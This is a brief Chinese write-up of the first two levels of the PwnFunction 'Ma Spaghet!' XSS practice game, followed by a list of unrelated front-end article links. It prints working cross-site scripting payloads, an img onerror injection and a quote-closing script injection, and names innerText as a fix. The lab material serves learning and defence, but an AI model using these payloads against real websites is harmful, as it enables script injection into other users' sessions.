xss高级靶场

一、环境

XSS Game - Ma Spaghet! | PwnFunction

二、开始闯关

第一关

看看代码

试一下直接写

明显进来了为什么不执行看看官方文档吧

你不执行那我就更改单标签去使用呗

复制代码
?somebody=<img%20src=1%20onerror="alert(1)">

防御:

innerText

第二关

看看源码:

考察一个基础的闭合

复制代码
?jeff=1";alert(1)//

后续待更新

相关推荐
qq_41126242几秒前
主要 bug/问题 以及 修改建议:
前端·人工智能·bug·四博智联·doit
曲莫终18 分钟前
JAVA原生Servlet支持SSE
前端·后端
用户486789525339018 分钟前
Apache ECharts 雷达图详解
前端·javascript
活着也很快乐21 分钟前
vite4 + react18 + react-router-dom6 路由懒加载、路由重定向
前端
吴玺喆23 分钟前
pnpm 10.14 支持JavaScript运行时的安装了
前端
Moment32 分钟前
2025 年,构建高质量 React 项目的技术栈参考 🤔🤔🤔
前端·javascript·react.js
陶甜也40 分钟前
MCP-Blender插件的安装和使用
前端·ai·blender
网小鱼的学习笔记43 分钟前
python基础:数据解析BeatuifulSoup,不需要考虑前端形式的一种获取元素的方法
开发语言·前端·python
aiwery1 小时前
深入理解React hooks:从设计初衷到自定义Hook指南
前端·设计模式
namehu1 小时前
阿里云 acme.sh install timeout(超时)问题解析与解决方案
linux·前端·https